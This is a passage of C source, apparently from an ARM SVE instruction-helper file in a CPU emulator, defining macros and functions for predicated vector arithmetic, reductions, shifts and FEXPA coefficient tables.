clz32) DO_ZPZ_D(sve_clz_d, uint64_t, clz64) DO_ZPZ(sve_cnt_zpz_b, uint8_t, H1, ctpop8) DO_ZPZ(sve_cnt_zpz_h, uint16_t, H1_2, ctpop16) DO_ZPZ(sve_cnt_zpz_s, uint32_t, H1_4, ctpop32) DO_ZPZ_D(sve_cnt_zpz_d, uint64_t, ctpop64) #define DO_CNOT(N) (N == 0) DO_ZPZ(sve_cnot_b, uint8_t, H1, DO_CNOT) DO_ZPZ(sve_cnot_h, uint16_t, H1_2, DO_CNOT) DO_ZPZ(sve_cnot_s, uint32_t, H1_4, DO_CNOT) DO_ZPZ_D(sve_cnot_d, uint64_t, DO_CNOT) #ifdef _MSC_VER #define DO_FABS16(N) (N & ((uint16_t)-1 >> 1)) #define DO_FABS32(N) (N & ((uint32_t)-1 >> 1)) #define DO_FABS64(N) (N & ((uint64_t)-1 >> 1)) DO_ZPZ(sve_fabs_h, uint16_t, H1_2, DO_FABS16) DO_ZPZ(sve_fabs_s, uint32_t, H1_4, DO_FABS32) DO_ZPZ_D(sve_fabs_d, uint64_t, DO_FABS64) #else #define DO_FABS(N) (N & ((__typeof(N))-1 >> 1)) DO_ZPZ(sve_fabs_h, uint16_t, H1_2, DO_FABS) DO_ZPZ(sve_fabs_s, uint32_t, H1_4, DO_FABS) DO_ZPZ_D(sve_fabs_d, uint64_t, DO_FABS) #endif #ifdef _MSC_VER #define DO_FNEG16(N) (N ^ ~((uint16_t)-1 >> 1)) #define DO_FNEG32(N) (N ^ ~((uint32_t)-1 >> 1)) #define DO_FNEG64(N) (N ^ ~((uint64_t)-1 >> 1)) DO_ZPZ(sve_fneg_h, uint16_t, H1_2, DO_FNEG16) DO_ZPZ(sve_fneg_s, uint32_t, H1_4, DO_FNEG32) DO_ZPZ_D(sve_fneg_d, uint64_t, DO_FNEG64) #else #define DO_FNEG(N) (N ^ ~((__typeof(N))-1 >> 1)) DO_ZPZ(sve_fneg_h, uint16_t, H1_2, DO_FNEG) DO_ZPZ(sve_fneg_s, uint32_t, H1_4, DO_FNEG) DO_ZPZ_D(sve_fneg_d, uint64_t, DO_FNEG) #endif #define DO_NOT(N) (~N) DO_ZPZ(sve_not_zpz_b, uint8_t, H1, DO_NOT) DO_ZPZ(sve_not_zpz_h, uint16_t, H1_2, DO_NOT) DO_ZPZ(sve_not_zpz_s, uint32_t, H1_4, DO_NOT) DO_ZPZ_D(sve_not_zpz_d, uint64_t, DO_NOT) #define DO_SXTB(N) ((int8_t)N) #define DO_SXTH(N) ((int16_t)N) #define DO_SXTS(N) ((int32_t)N) #define DO_UXTB(N) ((uint8_t)N) #define DO_UXTH(N) ((uint16_t)N) #define DO_UXTS(N) ((uint32_t)N) DO_ZPZ(sve_sxtb_h, uint16_t, H1_2, DO_SXTB) DO_ZPZ(sve_sxtb_s, uint32_t, H1_4, DO_SXTB) DO_ZPZ(sve_sxth_s, uint32_t, H1_4, DO_SXTH) DO_ZPZ_D(sve_sxtb_d, uint64_t, DO_SXTB) DO_ZPZ_D(sve_sxth_d, uint64_t, DO_SXTH) DO_ZPZ_D(sve_sxtw_d, uint64_t, DO_SXTS) DO_ZPZ(sve_uxtb_h, uint16_t, H1_2, DO_UXTB) DO_ZPZ(sve_uxtb_s, uint32_t, H1_4, DO_UXTB) DO_ZPZ(sve_uxth_s, uint32_t, H1_4, DO_UXTH) DO_ZPZ_D(sve_uxtb_d, uint64_t, DO_UXTB) DO_ZPZ_D(sve_uxth_d, uint64_t, DO_UXTH) DO_ZPZ_D(sve_uxtw_d, uint64_t, DO_UXTS) #ifdef _MSC_VER #define DO_ABS(N) (N < 0 ? (0 - N) : N) #else #define DO_ABS(N) (N < 0 ? -N : N) #endif DO_ZPZ(sve_abs_b, int8_t, H1, DO_ABS) DO_ZPZ(sve_abs_h, int16_t, H1_2, DO_ABS) DO_ZPZ(sve_abs_s, int32_t, H1_4, DO_ABS) DO_ZPZ_D(sve_abs_d, int64_t, DO_ABS) #ifdef _MSC_VER #define DO_NEG(N) (0 - N) #else #define DO_NEG(N) (-N) #endif DO_ZPZ(sve_neg_b, uint8_t, H1, DO_NEG) DO_ZPZ(sve_neg_h, uint16_t, H1_2, DO_NEG) DO_ZPZ(sve_neg_s, uint32_t, H1_4, DO_NEG) DO_ZPZ_D(sve_neg_d, uint64_t, DO_NEG) DO_ZPZ(sve_revb_h, uint16_t, H1_2, bswap16) DO_ZPZ(sve_revb_s, uint32_t, H1_4, bswap32) DO_ZPZ_D(sve_revb_d, uint64_t, bswap64) DO_ZPZ(sve_revh_s, uint32_t, H1_4, hswap32) DO_ZPZ_D(sve_revh_d, uint64_t, hswap64) DO_ZPZ_D(sve_revw_d, uint64_t, wswap64) DO_ZPZ(sve_rbit_b, uint8_t, H1, revbit8) DO_ZPZ(sve_rbit_h, uint16_t, H1_2, revbit16) DO_ZPZ(sve_rbit_s, uint32_t, H1_4, revbit32) DO_ZPZ_D(sve_rbit_d, uint64_t, revbit64) /* Three-operand expander, unpredicated, in which the third operand is "wide". */ #define DO_ZZW(NAME, TYPE, TYPEW, H, OP) \ void HELPER(NAME)(void *vd, void *vn, void *vm, uint32_t desc) \ { \ intptr_t i, opr_sz = simd_oprsz(desc); \ for (i = 0; i < opr_sz; ) { \ TYPEW mm = *(TYPEW *)((char *)vm + i); \ do { \ TYPE nn = *(TYPE *)((char *)vn + H(i)); \ *(TYPE *)((char *)vd + H(i)) = OP(nn, mm); \ i += sizeof(TYPE); \ } while (i & 7); \ } \ } DO_ZZW(sve_asr_zzw_b, int8_t, uint64_t, H1, DO_ASR) DO_ZZW(sve_lsr_zzw_b, uint8_t, uint64_t, H1, DO_LSR) DO_ZZW(sve_lsl_zzw_b, uint8_t, uint64_t, H1, DO_LSL) DO_ZZW(sve_asr_zzw_h, int16_t, uint64_t, H1_2, DO_ASR) DO_ZZW(sve_lsr_zzw_h, uint16_t, uint64_t, H1_2, DO_LSR) DO_ZZW(sve_lsl_zzw_h, uint16_t, uint64_t, H1_2, DO_LSL) DO_ZZW(sve_asr_zzw_s, int32_t, uint64_t, H1_4, DO_ASR) DO_ZZW(sve_lsr_zzw_s, uint32_t, uint64_t, H1_4, DO_LSR) DO_ZZW(sve_lsl_zzw_s, uint32_t, uint64_t, H1_4, DO_LSL) #undef DO_ZZW #undef DO_CLS_B #undef DO_CLS_H #undef DO_CLZ_B #undef DO_CLZ_H #undef DO_CNOT #undef DO_FABS #undef DO_FNEG #undef DO_ABS #undef DO_NEG #undef DO_ZPZ #undef DO_ZPZ_D /* Two-operand reduction expander, controlled by a predicate. * The difference between TYPERED and TYPERET has to do with * sign-extension. E.g. for SMAX, TYPERED must be signed, * but TYPERET must be unsigned so that e.g. a 32-bit value * is not sign-extended to the ABI uint64_t return type. */ /* ??? If we were to vectorize this by hand the reduction ordering * would change. For integer operands, this is perfectly fine. */ #define DO_VPZ(NAME, TYPEELT, TYPERED, TYPERET, H, INIT, OP) \ uint64_t HELPER(NAME)(void *vn, void *vg, uint32_t desc) \ { \ intptr_t i, opr_sz = simd_oprsz(desc); \ TYPERED ret = INIT; \ for (i = 0; i < opr_sz; ) { \ uint16_t pg = *(uint16_t *)((char *)vg + H1_2(i >> 3)); \ do { \ if (pg & 1) { \ TYPEELT nn = *(TYPEELT *)((char *)vn + H(i)); \ ret = OP(ret, nn); \ } \ i += sizeof(TYPEELT), pg >>= sizeof(TYPEELT); \ } while (i & 15); \ } \ return (TYPERET)ret; \ } #define DO_VPZ_D(NAME, TYPEE, TYPER, INIT, OP) \ uint64_t HELPER(NAME)(void *vn, void *vg, uint32_t desc) \ { \ intptr_t i, opr_sz = simd_oprsz(desc) / 8; \ TYPEE *n = vn; \ uint8_t *pg = vg; \ TYPER ret = INIT; \ for (i = 0; i < opr_sz; i += 1) { \ if (pg[H1(i)] & 1) { \ TYPEE nn = n[i]; \ ret = OP(ret, nn); \ } \ } \ return ret; \ } DO_VPZ(sve_orv_b, uint8_t, uint8_t, uint8_t, H1, 0, DO_ORR) DO_VPZ(sve_orv_h, uint16_t, uint16_t, uint16_t, H1_2, 0, DO_ORR) DO_VPZ(sve_orv_s, uint32_t, uint32_t, uint32_t, H1_4, 0, DO_ORR) DO_VPZ_D(sve_orv_d, uint64_t, uint64_t, 0, DO_ORR) DO_VPZ(sve_eorv_b, uint8_t, uint8_t, uint8_t, H1, 0, DO_EOR) DO_VPZ(sve_eorv_h, uint16_t, uint16_t, uint16_t, H1_2, 0, DO_EOR) DO_VPZ(sve_eorv_s, uint32_t, uint32_t, uint32_t, H1_4, 0, DO_EOR) DO_VPZ_D(sve_eorv_d, uint64_t, uint64_t, 0, DO_EOR) DO_VPZ(sve_andv_b, uint8_t, uint8_t, uint8_t, H1, -1, DO_AND) DO_VPZ(sve_andv_h, uint16_t, uint16_t, uint16_t, H1_2, -1, DO_AND) DO_VPZ(sve_andv_s, uint32_t, uint32_t, uint32_t, H1_4, -1, DO_AND) DO_VPZ_D(sve_andv_d, uint64_t, uint64_t, -1, DO_AND) DO_VPZ(sve_saddv_b, int8_t, uint64_t, uint64_t, H1, 0, DO_ADD) DO_VPZ(sve_saddv_h, int16_t, uint64_t, uint64_t, H1_2, 0, DO_ADD) DO_VPZ(sve_saddv_s, int32_t, uint64_t, uint64_t, H1_4, 0, DO_ADD) DO_VPZ(sve_uaddv_b, uint8_t, uint64_t, uint64_t, H1, 0, DO_ADD) DO_VPZ(sve_uaddv_h, uint16_t, uint64_t, uint64_t, H1_2, 0, DO_ADD) DO_VPZ(sve_uaddv_s, uint32_t, uint64_t, uint64_t, H1_4, 0, DO_ADD) DO_VPZ_D(sve_uaddv_d, uint64_t, uint64_t, 0, DO_ADD) DO_VPZ(sve_smaxv_b, int8_t, int8_t, uint8_t, H1, INT8_MIN, DO_MAX) DO_VPZ(sve_smaxv_h, int16_t, int16_t, uint16_t, H1_2, INT16_MIN, DO_MAX) DO_VPZ(sve_smaxv_s, int32_t, int32_t, uint32_t, H1_4, INT32_MIN, DO_MAX) DO_VPZ_D(sve_smaxv_d, int64_t, int64_t, INT64_MIN, DO_MAX) DO_VPZ(sve_umaxv_b, uint8_t, uint8_t, uint8_t, H1, 0, DO_MAX) DO_VPZ(sve_umaxv_h, uint16_t, uint16_t, uint16_t, H1_2, 0, DO_MAX) DO_VPZ(sve_umaxv_s, uint32_t, uint32_t, uint32_t, H1_4, 0, DO_MAX) DO_VPZ_D(sve_umaxv_d, uint64_t, uint64_t, 0, DO_MAX) DO_VPZ(sve_sminv_b, int8_t, int8_t, uint8_t, H1, INT8_MAX, DO_MIN) DO_VPZ(sve_sminv_h, int16_t, int16_t, uint16_t, H1_2, INT16_MAX, DO_MIN) DO_VPZ(sve_sminv_s, int32_t, int32_t, uint32_t, H1_4, INT32_MAX, DO_MIN) DO_VPZ_D(sve_sminv_d, int64_t, int64_t, INT64_MAX, DO_MIN) DO_VPZ(sve_uminv_b, uint8_t, uint8_t, uint8_t, H1, -1, DO_MIN) DO_VPZ(sve_uminv_h, uint16_t, uint16_t, uint16_t, H1_2, -1, DO_MIN) DO_VPZ(sve_uminv_s, uint32_t, uint32_t, uint32_t, H1_4, -1, DO_MIN) DO_VPZ_D(sve_uminv_d, uint64_t, uint64_t, -1, DO_MIN) #undef DO_VPZ #undef DO_VPZ_D /* Two vector operand, one scalar operand, unpredicated. */ #define DO_ZZI(NAME, TYPE, OP) \ void HELPER(NAME)(void *vd, void *vn, uint64_t s64, uint32_t desc) \ { \ intptr_t i, opr_sz = simd_oprsz(desc) / sizeof(TYPE); \ TYPE s = s64, *d = vd, *n = vn; \ for (i = 0; i < opr_sz; ++i) { \ d[i] = OP(n[i], s); \ } \ } #define DO_SUBR(X, Y) (Y - X) DO_ZZI(sve_subri_b, uint8_t, DO_SUBR) DO_ZZI(sve_subri_h, uint16_t, DO_SUBR) DO_ZZI(sve_subri_s, uint32_t, DO_SUBR) DO_ZZI(sve_subri_d, uint64_t, DO_SUBR) DO_ZZI(sve_smaxi_b, int8_t, DO_MAX) DO_ZZI(sve_smaxi_h, int16_t, DO_MAX) DO_ZZI(sve_smaxi_s, int32_t, DO_MAX) DO_ZZI(sve_smaxi_d, int64_t, DO_MAX) DO_ZZI(sve_smini_b, int8_t, DO_MIN) DO_ZZI(sve_smini_h, int16_t, DO_MIN) DO_ZZI(sve_smini_s, int32_t, DO_MIN) DO_ZZI(sve_smini_d, int64_t, DO_MIN) DO_ZZI(sve_umaxi_b, uint8_t, DO_MAX) DO_ZZI(sve_umaxi_h, uint16_t, DO_MAX) DO_ZZI(sve_umaxi_s, uint32_t, DO_MAX) DO_ZZI(sve_umaxi_d, uint64_t, DO_MAX) DO_ZZI(sve_umini_b, uint8_t, DO_MIN) DO_ZZI(sve_umini_h, uint16_t, DO_MIN) DO_ZZI(sve_umini_s, uint32_t, DO_MIN) DO_ZZI(sve_umini_d, uint64_t, DO_MIN) #undef DO_ZZI #undef DO_AND #undef DO_ORR #undef DO_EOR #undef DO_BIC #undef DO_ADD #undef DO_SUB #undef DO_MAX #undef DO_MIN #undef DO_ABD #undef DO_MUL #undef DO_DIV #undef DO_ASR #undef DO_LSR #undef DO_LSL #undef DO_SUBR /* Similar to the ARM LastActiveElement pseudocode function, except the result is multiplied by the element size. This includes the not found indication; e.g. not found for esz=3 is -8. */ static intptr_t last_active_element(uint64_t *g, intptr_t words, intptr_t esz) { uint64_t mask = pred_esz_masks[esz]; intptr_t i = words; do { uint64_t this_g = g[--i] & mask; if (this_g) { return i * 64 + (63 - clz64(this_g)); } } while (i > 0); return (intptr_t)-1 << esz; } uint32_t HELPER(sve_pfirst)(void *vd, void *vg, uint32_t words) { uint32_t flags = PREDTEST_INIT; uint64_t *d = vd, *g = vg; intptr_t i = 0; do { uint64_t this_d = d[i]; uint64_t this_g = g[i]; if (this_g) { if (!(flags & 4)) { /* Set in D the first bit of G. */ #ifdef _MSC_VER this_d |= this_g & (0 - this_g); #else this_d |= this_g & -this_g; #endif d[i] = this_d; } flags = iter_predtest_fwd(this_d, this_g, flags); } } while (++i < words); return flags; } uint32_t HELPER(sve_pnext)(void *vd, void *vg, uint32_t pred_desc) { intptr_t words = extract32(pred_desc, 0, SIMD_OPRSZ_BITS); intptr_t esz = extract32(pred_desc, SIMD_DATA_SHIFT, 2); uint32_t flags = PREDTEST_INIT; uint64_t *d = vd, *g = vg, esz_mask; intptr_t i, next; next = last_active_element(vd, words, esz) + (1ULL << esz); esz_mask = pred_esz_masks[esz]; /* Similar to the pseudocode for pnext, but scaled by ESZ so that we find the correct bit. */ if (next < words * 64) { uint64_t mask = -1; if (next & 63) { mask = ~((1ull << (next & 63)) - 1); next &= -64; } do { uint64_t this_g = g[next / 64] & esz_mask & mask; if (this_g != 0) { next = (next & -64) + ctz64(this_g); break; } next += 64; mask = -1; } while (next < words * 64); } i = 0; do { uint64_t this_d = 0; if (i == next / 64) { this_d = 1ull << (next & 63); } d[i] = this_d; flags = iter_predtest_fwd(this_d, g[i] & esz_mask, flags); } while (++i < words); return flags; } /* Store zero into every active element of Zd. We will use this for two * and three-operand predicated instructions for which logic dictates a * zero result. In particular, logical shift by element size, which is * otherwise undefined on the host. * * For element sizes smaller than uint64_t, we use tables to expand * the N bits of the controlling predicate to a byte mask, and clear * those bytes. */ void HELPER(sve_clr_b)(void *vd, void *vg, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd; uint8_t *pg = vg; for (i = 0; i < opr_sz; i += 1) { d[i] &= ~expand_pred_b(pg[H1(i)]); } } void HELPER(sve_clr_h)(void *vd, void *vg, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd; uint8_t *pg = vg; for (i = 0; i < opr_sz; i += 1) { d[i] &= ~expand_pred_h(pg[H1(i)]); } } void HELPER(sve_clr_s)(void *vd, void *vg, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd; uint8_t *pg = vg; for (i = 0; i < opr_sz; i += 1) { d[i] &= ~expand_pred_s(pg[H1(i)]); } } void HELPER(sve_clr_d)(void *vd, void *vg, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd; uint8_t *pg = vg; for (i = 0; i < opr_sz; i += 1) { if (pg[H1(i)] & 1) { d[i] = 0; } } } /* Copy Zn into Zd, and store zero into inactive elements. */ void HELPER(sve_movz_b)(void *vd, void *vn, void *vg, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd, *n = vn; uint8_t *pg = vg; for (i = 0; i < opr_sz; i += 1) { d[i] = n[i] & expand_pred_b(pg[H1(i)]); } } void HELPER(sve_movz_h)(void *vd, void *vn, void *vg, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd, *n = vn; uint8_t *pg = vg; for (i = 0; i < opr_sz; i += 1) { d[i] = n[i] & expand_pred_h(pg[H1(i)]); } } void HELPER(sve_movz_s)(void *vd, void *vn, void *vg, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd, *n = vn; uint8_t *pg = vg; for (i = 0; i < opr_sz; i += 1) { d[i] = n[i] & expand_pred_s(pg[H1(i)]); } } void HELPER(sve_movz_d)(void *vd, void *vn, void *vg, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd, *n = vn; uint8_t *pg = vg; for (i = 0; i < opr_sz; i += 1) { #ifdef _MSC_VER d[i] = n[i] & ((uint64_t)0 - (uint64_t)(pg[H1(i)] & 1)); #else d[i] = n[i] & -(uint64_t)(pg[H1(i)] & 1); #endif } } /* Three-operand expander, immediate operand, controlled by a predicate. */ #define DO_ZPZI(NAME, TYPE, H, OP) \ void HELPER(NAME)(void *vd, void *vn, void *vg, uint32_t desc) \ { \ intptr_t i, opr_sz = simd_oprsz(desc); \ TYPE imm = simd_data(desc); \ for (i = 0; i < opr_sz; ) { \ uint16_t pg = *(uint16_t *)((char *)vg + H1_2(i >> 3)); \ do { \ if (pg & 1) { \ TYPE nn = *(TYPE *)((char *)vn + H(i)); \ *(TYPE *)((char *)vd + H(i)) = OP(nn, imm); \ } \ i += sizeof(TYPE), pg >>= sizeof(TYPE); \ } while (i & 15); \ } \ } /* Similarly, specialized for 64-bit operands. */ #define DO_ZPZI_D(NAME, TYPE, OP) \ void HELPER(NAME)(void *vd, void *vn, void *vg, uint32_t desc) \ { \ intptr_t i, opr_sz = simd_oprsz(desc) / 8; \ TYPE *d = vd, *n = vn; \ TYPE imm = simd_data(desc); \ uint8_t *pg = vg; \ for (i = 0; i < opr_sz; i += 1) { \ if (pg[H1(i)] & 1) { \ TYPE nn = n[i]; \ d[i] = OP(nn, imm); \ } \ } \ } #define DO_SHR(N, M) (N >> M) #define DO_SHL(N, M) (N << M) /* Arithmetic shift right for division. This rounds negative numbers toward zero as per signed division. Therefore before shifting, when N is negative, add 2**M-1. */ #ifdef _MSC_VER #define DO_ASRD(N, M) ((N + (N < 0 ? (1 << M) - 1 : 0)) >> M) #else #define DO_ASRD(N, M) ((N + (N < 0 ? ((__typeof(N))1 << M) - 1 : 0)) >> M) #endif DO_ZPZI(sve_asr_zpzi_b, int8_t, H1, DO_SHR) DO_ZPZI(sve_asr_zpzi_h, int16_t, H1_2, DO_SHR) DO_ZPZI(sve_asr_zpzi_s, int32_t, H1_4, DO_SHR) DO_ZPZI_D(sve_asr_zpzi_d, int64_t, DO_SHR) DO_ZPZI(sve_lsr_zpzi_b, uint8_t, H1, DO_SHR) DO_ZPZI(sve_lsr_zpzi_h, uint16_t, H1_2, DO_SHR) DO_ZPZI(sve_lsr_zpzi_s, uint32_t, H1_4, DO_SHR) DO_ZPZI_D(sve_lsr_zpzi_d, uint64_t, DO_SHR) DO_ZPZI(sve_lsl_zpzi_b, uint8_t, H1, DO_SHL) DO_ZPZI(sve_lsl_zpzi_h, uint16_t, H1_2, DO_SHL) DO_ZPZI(sve_lsl_zpzi_s, uint32_t, H1_4, DO_SHL) DO_ZPZI_D(sve_lsl_zpzi_d, uint64_t, DO_SHL) DO_ZPZI(sve_asrd_b, int8_t, H1, DO_ASRD) DO_ZPZI(sve_asrd_h, int16_t, H1_2, DO_ASRD) DO_ZPZI(sve_asrd_s, int32_t, H1_4, DO_ASRD) DO_ZPZI_D(sve_asrd_d, int64_t, DO_ASRD) #undef DO_SHR #undef DO_SHL #undef DO_ASRD #undef DO_ZPZI #undef DO_ZPZI_D /* Fully general four-operand expander, controlled by a predicate. */ #define DO_ZPZZZ(NAME, TYPE, H, OP) \ void HELPER(NAME)(void *vd, void *va, void *vn, void *vm, \ void *vg, uint32_t desc) \ { \ intptr_t i, opr_sz = simd_oprsz(desc); \ for (i = 0; i < opr_sz; ) { \ uint16_t pg = *(uint16_t *)((char *)vg + H1_2(i >> 3)); \ do { \ if (pg & 1) { \ TYPE nn = *(TYPE *)((char *)vn + H(i)); \ TYPE mm = *(TYPE *)((char *)vm + H(i)); \ TYPE aa = *(TYPE *)((char *)va + H(i)); \ *(TYPE *)((char *)vd + H(i)) = OP(aa, nn, mm); \ } \ i += sizeof(TYPE), pg >>= sizeof(TYPE); \ } while (i & 15); \ } \ } /* Similarly, specialized for 64-bit operands. */ #define DO_ZPZZZ_D(NAME, TYPE, OP) \ void HELPER(NAME)(void *vd, void *va, void *vn, void *vm, \ void *vg, uint32_t desc) \ { \ intptr_t i, opr_sz = simd_oprsz(desc) / 8; \ TYPE *d = vd, *a = va, *n = vn, *m = vm; \ uint8_t *pg = vg; \ for (i = 0; i < opr_sz; i += 1) { \ if (pg[H1(i)] & 1) { \ TYPE aa = a[i], nn = n[i], mm = m[i]; \ d[i] = OP(aa, nn, mm); \ } \ } \ } #define DO_MLA(A, N, M) (A + N * M) #define DO_MLS(A, N, M) (A - N * M) DO_ZPZZZ(sve_mla_b, uint8_t, H1, DO_MLA) DO_ZPZZZ(sve_mls_b, uint8_t, H1, DO_MLS) DO_ZPZZZ(sve_mla_h, uint16_t, H1_2, DO_MLA) DO_ZPZZZ(sve_mls_h, uint16_t, H1_2, DO_MLS) DO_ZPZZZ(sve_mla_s, uint32_t, H1_4, DO_MLA) DO_ZPZZZ(sve_mls_s, uint32_t, H1_4, DO_MLS) DO_ZPZZZ_D(sve_mla_d, uint64_t, DO_MLA) DO_ZPZZZ_D(sve_mls_d, uint64_t, DO_MLS) #undef DO_MLA #undef DO_MLS #undef DO_ZPZZZ #undef DO_ZPZZZ_D void HELPER(sve_index_b)(void *vd, uint32_t start, uint32_t incr, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc); uint8_t *d = vd; for (i = 0; i < opr_sz; i += 1) { d[H1(i)] = start + i * incr; } } void HELPER(sve_index_h)(void *vd, uint32_t start, uint32_t incr, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 2; uint16_t *d = vd; for (i = 0; i < opr_sz; i += 1) { d[H2(i)] = start + i * incr; } } void HELPER(sve_index_s)(void *vd, uint32_t start, uint32_t incr, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 4; uint32_t *d = vd; for (i = 0; i < opr_sz; i += 1) { d[H4(i)] = start + i * incr; } } void HELPER(sve_index_d)(void *vd, uint64_t start, uint64_t incr, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd; for (i = 0; i < opr_sz; i += 1) { d[i] = start + i * incr; } } void HELPER(sve_adr_p32)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 4; uint32_t sh = simd_data(desc); uint32_t *d = vd, *n = vn, *m = vm; for (i = 0; i < opr_sz; i += 1) { d[i] = n[i] + (m[i] << sh); } } void HELPER(sve_adr_p64)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t sh = simd_data(desc); uint64_t *d = vd, *n = vn, *m = vm; for (i = 0; i < opr_sz; i += 1) { d[i] = n[i] + (m[i] << sh); } } void HELPER(sve_adr_s32)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t sh = simd_data(desc); uint64_t *d = vd, *n = vn, *m = vm; for (i = 0; i < opr_sz; i += 1) { d[i] = n[i] + ((uint64_t)(int32_t)m[i] << sh); } } void HELPER(sve_adr_u32)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t sh = simd_data(desc); uint64_t *d = vd, *n = vn, *m = vm; for (i = 0; i < opr_sz; i += 1) { d[i] = n[i] + ((uint64_t)(uint32_t)m[i] << sh); } } void HELPER(sve_fexpa_h)(void *vd, void *vn, uint32_t desc) { /* These constants are cut-and-paste directly from the ARM pseudocode. */ static const uint16_t coeff[] = { 0x0000, 0x0016, 0x002d, 0x0045, 0x005d, 0x0075, 0x008e, 0x00a8, 0x00c2, 0x00dc, 0x00f8, 0x0114, 0x0130, 0x014d, 0x016b, 0x0189, 0x01a8, 0x01c8, 0x01e8, 0x0209, 0x022b, 0x024e, 0x0271, 0x0295, 0x02ba, 0x02e0, 0x0306, 0x032e, 0x0356, 0x037f, 0x03a9, 0x03d4, }; intptr_t i, opr_sz = simd_oprsz(desc) / 2; uint16_t *d = vd, *n = vn; for (i = 0; i < opr_sz; i++) { uint16_t nn = n[i]; intptr_t idx = extract32(nn, 0, 5); uint16_t exp = extract32(nn, 5, 5); d[i] = coeff[idx] | (exp << 10); } } void HELPER(sve_fexpa_s)(void *vd, void *vn, uint32_t desc) { /* These constants are cut-and-paste directly from the ARM pseudocode. */ static const uint32_t coeff[] = { 0x000000, 0x0164d2, 0x02cd87, 0x043a29, 0x05aac3, 0x071f62, 0x08980f, 0x0a14d5, 0x0b95c2, 0x0d1adf, 0x0ea43a, 0x1031dc, 0x11c3d3, 0x135a2b, 0x14f4f0, 0x16942d, 0x1837f0, 0x19e046, 0x1b8d3a, 0x1d3eda, 0x1ef532, 0x20b051, 0x227043, 0x243516, 0x25fed7, 0x27cd94, 0x29a15b, 0x2b7a3a, 0x2d583f, 0x2f3b79, 0x3123f6, 0x3311c4, 0x3504f3, 0x36fd92, 0x38fbaf, 0x3aff5b, 0x3d08a4, 0x3f179a, 0x412c4d, 0x4346cd, 0x45672a, 0x478d75, 0x49b9be, 0x4bec15, 0x4e248c, 0x506334, 0x52a81e, 0x54f35b, 0x5744fd, 0x599d16, 0x5bfbb8, 0x5e60f5, 0x60ccdf, 0x633f89, 0x65b907, 0x68396a, 0x6ac0c7, 0x6d4f30, 0x6fe4ba, 0x728177, 0x75257d, 0x77d0df, 0x7a83b3, 0x7d3e0c, }; intptr_t i, opr_sz = simd_oprsz(desc) / 4; uint32_t *d = vd, *n = vn; for (i = 0; i < opr_sz; i++) { uint32_t nn = n[i]; intptr_t idx = extract32(nn, 0, 6); uint32_t exp = extract32(nn, 6, 8); d[i] = coeff[idx] | (exp << 23); } } void HELPER(sve_fexpa_d)(void *vd, void *vn, uint32_t desc) { /* These constants are cut-and-paste directly from the ARM pseudocode. */ static const uint64_t coeff[] = { 0x0000000000000ull, 0x02C9A3E778061ull, 0x059B0D3158574ull, 0x0874518759BC8ull, 0x0B5586CF9890Full, 0x0E3EC32D3D1A2ull, 0x11301D0125B51ull, 0x1429AAEA92DE0ull, 0x172B83C7D517Bull, 0x1A35BEB6FCB75ull, 0x1D4873168B9AAull, 0x2063B88628CD6ull, 0x2387A6E756238ull, 0x26B4565E27CDDull, 0x29E9DF51FDEE1ull, 0x2D285A6E4030Bull, 0x306FE0A31B715ull, 0x33C08B26416FFull, 0x371A7373AA9CBull, 0x3A7DB34E59FF7ull, 0x3DEA64C123422ull, 0x4160A21F72E2Aull, 0x44E086061892Dull, 0x486A2B5C13CD0ull, 0x4BFDAD5362A27ull, 0x4F9B2769D2CA7ull, 0x5342B569D4F82ull, 0x56F4736B527DAull, 0x5AB07DD485429ull, 0x5E76F15AD2148ull, 0x6247EB03A5585ull, 0x6623882552225ull, 0x6A09E667F3BCDull, 0x6DFB23C651A2Full, 0x71F75E8EC5F74ull, 0x75FEB564267C9ull, 0x7A11473EB0187ull, 0x7E2F336CF4E62ull, 0x82589994CCE13ull, 0x868D99B4492EDull, 0x8ACE5422AA0DBull, 0x8F1AE99157736ull, 0x93737B0CDC5E5ull, 0x97D829FDE4E50ull, 0x9C49182A3F090ull, 0xA0C667B5DE565ull, 0xA5503B23E255Dull, 0xA9E6B5579FDBFull, 0xAE89F995AD3ADull, 0xB33A2B84F15FBull, 0xB7F76F2FB5E47ull, 0xBCC1E904BC1D2ull, 0xC199BDD85529Cull, 0xC67F12E57D14Bull, 0xCB720DCEF9069ull, 0xD072D4A07897Cull, 0xD5818DCFBA487ull, 0xDA9E603DB3285ull, 0xDFC97337B9B5Full, 0xE502EE78B3FF6ull, 0xEA4AFA2A490DAull, 0xEFA1BEE615A27ull, 0xF50765B6E4540ull, 0xFA7C1819E90D8ull, }; intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd, *n = vn; for (i = 0; i < opr_sz; i++) { uint64_t nn = n[i]; intptr_t idx = extract32(nn, 0, 6); uint64_t exp = extract32(nn, 6, 11); d[i] = coeff[idx] | (exp << 52); } } void HELPER(sve_ftssel_h)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 2; uint16_t *d = vd, *n = vn, *m = vm; for (i = 0; i < opr_sz; i += 1) { uint16_t nn = n[i]; uint16_t mm = m[i]; if (mm & 1) { nn = float16_one; } d[i] = nn ^ (mm & 2) << 14; } } void HELPER(sve_ftssel_s)(void *vd, void *vn, void *vm, uint32_t 